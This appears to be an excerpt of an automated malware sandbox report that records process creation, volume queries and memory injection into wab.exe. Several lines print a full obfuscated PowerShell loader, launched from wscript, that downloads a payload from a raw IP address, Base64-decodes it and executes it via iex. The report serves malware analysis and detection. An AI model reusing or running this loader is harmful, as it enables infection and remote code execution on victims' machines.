        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EE0000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EAF958Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$hovedafbryderes = 1;$dives='substrin';$dives+='g';function rumper($ninox){$tomatillo=$ninox.length-$hovedafbryderes;for($skumle=1; $skumle -lt $tomatillo; $skumle+=(2)){$tiredly+=$ninox.$dives.invoke($skumle, $hovedafbryderes);}$tiredly;}function funmaker($fedtsyrers){. ($inclosers) ($fedtsyrers);}$wacky=rumper 'bm o,z itlnl a / 5 . 0 ( w i,n d ohw.si un,t 1.0p. 0s;s wni nc6,4,;d sx 6,4t; r,vl: 1n2i1j. 0.). vg.e.cfkcos/ 2 0,1s0f0 1i0r1e lf,iir.e fso.x /r1.2l1 . 0 ';$sials=rumper 'tubsne,r -la.gpe n tu ';$mucormycosis=rumper ' hrt t,pt: /./.8o7t..1 2l1...1.0i5c..1 6s3a/,s.t esr.epost,y,pleor iun gie n,sb7 2 .,x,senl ';$lecideiform=rumper 'g>u ';$inclosers=rumper ' i e,xs ';$salrs227='revanchister';funmaker (rumper ',smeot -,c.o,nzt esn tf -.p.autph utg:b\adsi,b r oom,o b e n zpe n ec.ft,x t - vaapl ule $jspa lurks 2 2 7t;s ');funmaker (rumper 'pi,f, g(,t ebs.t -rpaadtsh. ttp:c\rd iub,r ogmsofbae.npz esn,ee. ttx,t,) {dewx i td}c;, ');$southrons = rumper 'te.cmhoo. ,%ba,p,p d aktwad%i\ha.r g,esarna.om e nc t&s&d ehc hko $ ';funmaker (rumper 's$cg.l.oab,a l.:.u m obtli vsesr evd ebs =k(,ctmfdf / c ,$ s osu tkh.rpocn,s )u ');funmaker (rumper 'f$ gnl.oubtakl :gdse,f itl.e.sv1 2 2s= $ummuicsofrpm,y cso,s,iusp.as p.l i te(,$ l etcxild egibffo.r mt)m ');$mucormycosis=$defiles122[0];funmaker (rumper ' $.gfl odbsasl : ggrra,a,l i g spt ee=gn.efwk-.o,b.j eccjtw hssy snt e.me.xn e,tg.dw,enbnc l,ile.notf ');funmaker (rumper 's$tgdrsa arl.i.ges.tfe...h e aadse.r s [ $cs.i aslbss]a= $hwsalccksy ');$folkekongressen=rumper 'ugpr aaaal.i gtshtde..ad,osw,n l ora.dkf,i lmes(h$.mbuuc,ofrkmpyecrops,i sr,c$sa fgm,n.sutmrkeunrd.ems ) ';$folkekongressen=$umotiveredes[1]+$folkekongressen;$afmnstrendes=$umotiveredes[0];funmaker (rumper ' $ g,l ofbhawl :.f rsi.t nlkserr i =k(mtne s tq-kp,ast,h t$fatfgm ngs.tgrzemn dsems )p ');while (!$fritnkeri) {funmaker (rumper ' $dg.l o bea,lp:sp.arr kje,rhihn gjsfsgkuitv e.n,=c$ t r,ure, ') ;funmaker $folkekongressen;funmaker (rumper 'tsntkalrst -gssl efenpg s4a ');funmaker (rumper 'r$sgalbopb.acle:cf.rkitt ntk eor ir=e(nt,eusftf-,p ast.ha $.acf mpncs t rce ngdie,se)h ') ;funmaker (rumper ' $ug.lmosbha ls: b,odl ddgba dse n = $,g l.ohbfadlu:ub,rpu,nzk ubl s,l ebj ertb+h+k% $ddoelf,i l e.s 1p2s2 .rc o,u nmt ') ;$mucormycosis=$defiles122[$boldgaden];}funmaker (rumper ' $.golpodb.anl :ufvrse,mladduswt r b e n d e,sr =b kg e tn- c.opnzt enn.ts .$oa,f mtnzs,t,r.eenadie ss ');funmaker (rumper 'd$sgcl.ogbmaals:apshhi l o,nci cs k=a [ss ytsttme.me. cio n.vse,r,t,] :b: ffrso,m b ass.e 6,4bs tdroihnag (,$sf raeum afdms t r,bae n dkeksr)m ');funmaker (rumper 'e$tgjlpo baabl.:tbas,scetlib,e t s, .=k [ s,y.sct e,m . t epxit . e n cioddsi,nago] :p:ma s c,idis.vg.e ths.trr i nmgf(c$mp hti l,o n.i,ce) ');funmaker (rumper 'm$eg,lsopb aal :clkabr.y.npgrootrogmfef=r$,b,s spealpbse trsd.ds uqbmstt r.isnmgs(s2.7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$hovedafbryderes = 1;$dives='substrin';$dives+='g';function rumper($ninox){$tomatillo=$ninox.length-$hovedafbryderes;for($skumle=1; $skumle -lt $tomatillo; $skumle+=(2)){$tiredly+=$ninox.$dives.invoke($skumle, $hovedafbryderes);}$tiredly;}function funmaker($fedtsyrers){. ($inclosers) ($fedtsyrers);}$wacky=rumper 'bm o,z itlnl a / 5 . 0 ( w i,n d ohw.si un,t 1.0p. 0s;s wni nc6,4,;d sx 6,4t; r,vl: 1n2i1j. 0.). vg.e.cfkcos/ 2 0,1s0f0 1i0r1e lf,iir.e fso.x /r1.2l1 . 0 ';$sials=rumper 'tubsne,r -la.gpe n tu ';$mucormycosis=rumper ' hrt t,pt: /./.8o7t..1 2l1...1.0i5c..1 6s3a/,s.t esr.epost,y,pleor iun gie n,sb7 2 .,x,senl ';$lecideiform=rumper 'g>u ';$inclosers=rumper ' i e,xs ';$salrs227='revanchister';funmaker (rumper ',smeot -,c.o,nzt esn tf -.p.autph utg:b\adsi,b r oom,o b e n zpe n ec.ft,x t - vaapl ule $jspa lurks 2 2 7t;s ');funmaker (rumper 'pi,f, g(,t ebs.t -rpaadtsh. ttp:c\rd iub,r ogmsofbae.npz esn,ee. ttx,t,) {dewx i td}c;, ');$southrons = rumper 'te.cmhoo. ,%ba,p,p d aktwad%i\ha.r g,esarna.om e nc t&s&d ehc hko $ ';funmaker (rumper 's$cg.l.oab,a l.:.u m obtli vsesr evd ebs =k(,ctmfdf / c ,$ s osu tkh.rpocn,s )u ');funmaker (rumper 'f$ gnl.oubtakl :gdse,f itl.e.sv1 2 2s= $ummuicsofrpm,y cso,s,iusp.as p.l i te(,$ l etcxild egibffo.r mt)m ');$mucormycosis=$defiles122[0];funmaker (rumper ' $.gfl odbsasl : ggrra,a,l i g spt ee=gn.efwk-.o,b.j eccjtw hssy snt e.me.xn e,tg.dw,enbnc l,ile.notf ');funmaker (rumper 's$tgdrsa arl.i.ges.tfe...h e aadse.r s [ $cs.i aslbss]a= $hwsalccksy ');$folkekongressen=rumper 'ugpr aaaal.i gtshtde..ad,osw,n l ora.dkf,i lmes(h$.mbuuc,ofrkmpyecrops,i sr,c$sa fgm,n.sutmrkeunrd.ems ) ';$folkekongressen=$umotiveredes[1]+$folkekongressen;$afmnstrendes=$umotiveredes[0];funmaker (rumper ' $ g,l ofbhawl :.f rsi.t nlkserr i =k(mtne s tq-kp,ast,h t$fatfgm ngs.tgrzemn dsems )p ');while (!$fritnkeri) {funmaker (rumper ' $dg.l o bea,lp:sp.arr kje,rhihn gjsfsgkuitv e.n,=c$ t r,ure, ') ;funmaker $folkekongressen;funmaker (rumper 'tsntkalrst -gssl efenpg s4a ');funmaker (rumper 'r$sgalbopb.acle:cf.rkitt ntk eor ir=e(nt,eusftf-,p ast.ha $.acf mpncs t rce ngdie,se)h ') ;funmaker (rumper ' $ug.lmosbha ls: b,odl ddgba dse n = $,g l.ohbfadlu:ub,rpu,nzk ubl s,l ebj ertb+h+k% $ddoelf,i l e.s 1p2s2 .rc o,u nmt ') ;$mucormycosis=$defiles122[$boldgaden];}funmaker (rumper ' $.golpodb.anl :ufvrse,mladduswt r b e n d e,sr =b kg e tn- c.opnzt enn.ts .$oa,f mtnzs,t,r.eenadie ss ');funmaker (rumper 'd$sgcl.ogbmaals:apshhi l o,nci cs k=a [ss ytsttme.me. cio n.vse,r,t,] :b: ffrso,m b ass.e 6,4bs tdroihnag (,$sf raeum afdms t r,bae n dkeksr)m ');funmaker (rumper 'e$tgjlpo baabl.:tbas,scetlib,e t s, .=k [ s,y.sct e,m . t epxit . e n cioddsi,nago] :p:ma s c,idis.vg.e ths.trr i nmgf(c$mp hti l,o n.i,ce) ');funmaker (rumper 'm$eg,lsopb aal :clkabr.y.npgrootrogmfef=r$,b,s spealpbse trsd.ds uqbmstt r.isnmgs(s2.7
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$hovedafbryderes = 1;$dives='substrin';$dives+='g';function rumper($ninox){$tomatillo=$ninox.length-$hovedafbryderes;for($skumle=1; $skumle -lt $tomatillo; $skumle+=(2)){$tiredly+=$ninox.$dives.invoke($skumle, $hovedafbryderes);}$tiredly;}function funmaker($fedtsyrers){. ($inclosers) ($fedtsyrers);}$wacky=rumper 'bm o,z itlnl a / 5 . 0 ( w i,n d ohw.si un,t 1.0p. 0s;s wni nc6,4,;d sx 6,4t; r,vl: 1n2i1j. 0.). vg.e.cfkcos/ 2 0,1s0f0 1i0r1e lf,iir.e fso.x /r1.2l1 . 0 ';$sials=rumper 'tubsne,r -la.gpe n tu ';$mucormycosis=rumper ' hrt t,pt: /./.8o7t..1 2l1...1.0i5c..1 6s3a/,s.t esr.epost,y,pleor iun gie n,sb7 2 .,x,senl ';$lecideiform=rumper 'g>u ';$inclosers=rumper ' i e,xs ';$salrs227='revanchister';funmaker (rumper ',smeot -,c.o,nzt esn tf -.p.autph utg:b\adsi,b r oom,o b e n zpe n ec.ft,x t - vaapl ule $jspa lurks 2 2 7t;s ');funmaker (rumper 'pi,f, g(,t ebs.t -rpaadtsh. ttp:c\rd iub,r ogmsofbae.npz esn,ee. ttx,t,) {dewx i td}c;, ');$southrons = rumper 'te.cmhoo. ,%ba,p,p d aktwad%i\ha.r g,esarna.om e nc t&s&d ehc hko $ ';funmaker (rumper 's$cg.l.oab,a l.:.u m obtli vsesr evd ebs =k(,ctmfdf / c ,$ s osu tkh.rpocn,s )u ');funmaker (rumper 'f$ gnl.oubtakl :gdse,f itl.e.sv1 2 2s= $ummuicsofrpm,y cso,s,iusp.as p.l i te(,$ l etcxild egibffo.r mt)m ');$mucormycosis=$defiles122[0];funmaker (rumper ' $.gfl odbsasl : ggrra,a,l i g spt ee=gn.efwk-.o,b.j eccjtw hssy snt e.me.xn e,tg.dw,enbnc l,ile.notf ');funmaker (rumper 's$tgdrsa arl.i.ges.tfe...h e aadse.r s [ $cs.i aslbss]a= $hwsalccksy ');$folkekongressen=rumper 'ugpr aaaal.i gtshtde..ad,osw,n l ora.dkf,i lmes(h$.mbuuc,ofrkmpyecrops,i sr,c$sa fgm,n.sutmrkeunrd.ems ) ';$folkekongressen=$umotiveredes[1]+$folkekongressen;$afmnstrendes=$umotiveredes[0];funmaker (rumper ' $ g,l ofbhawl :.f rsi.t nlkserr i =k(mtne s tq-kp,ast,h t$fatfgm ngs.tgrzemn dsems )p ');while (!$fritnkeri) {funmaker (rumper ' $dg.l o bea,lp:sp.arr kje,rhihn gjsfsgkuitv e.n,=c$ t r,ure, ') ;funmaker $folkekongressen;funmaker (rumper 'tsntkalrst -gssl efenpg s4a ');funmaker (rumper 'r$sgalbopb.acle:cf.rkitt ntk eor ir=e(nt,eusftf-,p ast.ha $.acf mpncs t rce ngdie,se)h ') ;funmaker (rumper ' $ug.lmosbha ls: b,odl ddgba dse n = $,g l.ohbfadlu:ub,rpu,nzk ubl s,l ebj ertb+h+k% $ddoelf,i l e.s 1p2s2 .rc o,u nmt ') ;$mucormycosis=$defiles122[$boldgaden];}funmaker (rumper ' $.golpodb.anl :ufvrse,mladduswt r b e n d e,sr =b kg e tn- c.opnzt enn.ts .$oa,f mtnzs,t,r.eenadie ss ');funmaker (rumper 'd$sgcl.ogbmaals:apshhi l o,nci cs k=a [ss ytsttme.me. cio n.vse,r,t,] :b: ffrso,m b ass.e 6,4bs tdroihnag (,$sf raeum afdms t r,bae n dkeksr)m ');funmaker (rumper 'e$tgjlpo baabl.:tbas,scetlib,e t s, .=k [ s,y.sct e,m . t epxit . e n cioddsi,nago] :p:ma s c,idis.vg.e ths.trr i nmgf(c$mp hti l,o n.i,ce) ');funmaker (rumper 'm$eg,lsopb aal :clkabr.y.npgrootrogmfef=r$,b,s spealpbse trsd.ds uqbmstt r.isnmgs(s2.7Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$hovedafbryderes = 1;$dives='substrin';$dives+='g';function rumper($ninox){$tomatillo=$ninox.length-$hovedafbryderes;for($skumle=1; $skumle -lt $tomatillo; $skumle+=(2)){$tiredly+=$ninox.$dives.invoke($skumle, $hovedafbryderes);}$tiredly;}function funmaker($fedtsyrers){. ($inclosers) ($fedtsyrers);}$wacky=rumper 'bm o,z itlnl a / 5 . 0 ( w i,n d ohw.si un,t 1.0p. 0s;s wni nc6,4,;d sx 6,4t; r,vl: 1n2i1j. 0.). vg.e.cfkcos/ 2 0,1s0f0 1i0r1e lf,iir.e fso.x /r1.2l1 . 0 ';$sials=rumper 'tubsne,r -la.gpe n tu ';$mucormycosis=rumper ' hrt t,pt: /./.8o7t..1 2l1...1.0i5c..1 6s3a/,s.t esr.epost,y,pleor iun gie n,sb7 2 .,x,senl ';$lecideiform=rumper 'g>u ';$inclosers=rumper ' i e,xs ';$salrs227='revanchister';funmaker (rumper ',smeot -,c.o,nzt esn tf -.p.autph utg:b\adsi,b r oom,o b e n zpe n ec.ft,x t - vaapl ule $jspa lurks 2 2 7t;s ');funmaker (rumper 'pi,f, g(,t ebs.t -rpaadtsh. ttp:c\rd iub,r ogmsofbae.npz esn,ee. ttx,t,) {dewx i td}c;, ');$southrons = rumper 'te.cmhoo. ,%ba,p,p d aktwad%i\ha.r g,esarna.om e nc t&s&d ehc hko $ ';funmaker (rumper 's$cg.l.oab,a l.:.u m obtli vsesr evd ebs =k(,ctmfdf / c ,$ s osu tkh.rpocn,s )u ');funmaker (rumper 'f$ gnl.oubtakl :gdse,f itl.e.sv1 2 2s= $ummuicsofrpm,y cso,s,iusp.as p.l i te(,$ l etcxild egibffo.r mt)m ');$mucormycosis=$defiles122[0];funmaker (rumper ' $.gfl odbsasl : ggrra,a,l i g spt ee=gn.efwk-.o,b.j eccjtw hssy snt e.me.xn e,tg.dw,enbnc l,ile.notf ');funmaker (rumper 's$tgdrsa arl.i.ges.tfe...h e aadse.r s [ $cs.i aslbss]a= $hwsalccksy ');$folkekongressen=rumper 'ugpr aaaal.i gtshtde..ad,osw,n l ora.dkf,i lmes(h$.mbuuc,ofrkmpyecrops,i sr,c$sa fgm,n.sutmrkeunrd.ems ) ';$folkekongressen=$umotiveredes[1]+$folkekongressen;$afmnstrendes=$umotiveredes[0];funmaker (rumper ' $ g,l ofbhawl :.f rsi.t nlkserr i =k(mtne s tq-kp,ast,h t$fatfgm ngs.tgrzemn dsems )p ');while (!$fritnkeri) {funmaker (rumper ' $dg.l o bea,lp:sp.arr kje,rhihn gjsfsgkuitv e.n,=c$ t r,ure, ') ;funmaker $folkekongressen;funmaker (rumper 'tsntkalrst -gssl efenpg s4a ');funmaker (rumper 'r$sgalbopb.acle:cf.rkitt ntk eor ir=e(nt,eusftf-,p ast.ha $.acf mpncs t rce ngdie,se)h ') ;funmaker (rumper ' $ug.lmosbha ls: b,odl ddgba dse n = $,g l.ohbfadlu:ub,rpu,nzk ubl s,l ebj ertb+h+k% $ddoelf,i l e.s 1p2s2 .rc o,u nmt ') ;$mucormycosis=$defiles122[$boldgaden];}funmaker (rumper ' $.golpodb.anl :ufvrse,mladduswt r b e n d e,sr =b kg e tn- c.opnzt enn.ts .$oa,f mtnzs,t,r.eenadie ss ');funmaker (rumper 'd$sgcl.ogbmaals:apshhi l o,nci cs k=a [ss ytsttme.me. cio n.vse,r,t,] :b: ffrso,m b ass.e 6,4bs tdroihnag (,$sf raeum afdms t r,bae n dkeksr)m ');funmaker (rumper 'e$tgjlpo baabl.:tbas,scetlib,e t s, .=k [ s,y.sct e,m . t epxit . e n cioddsi,nago] :p:ma s c,idis.vg.e ths.trr i nmgf(c$mp hti l,o n.i,ce) ');funmaker (rumper 'm$eg,lsopb aal :clkabr.y.npgrootrogmfef=r$,b,s spealpbse trsd.ds uqbmstt r.isnmgs(s2.7Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
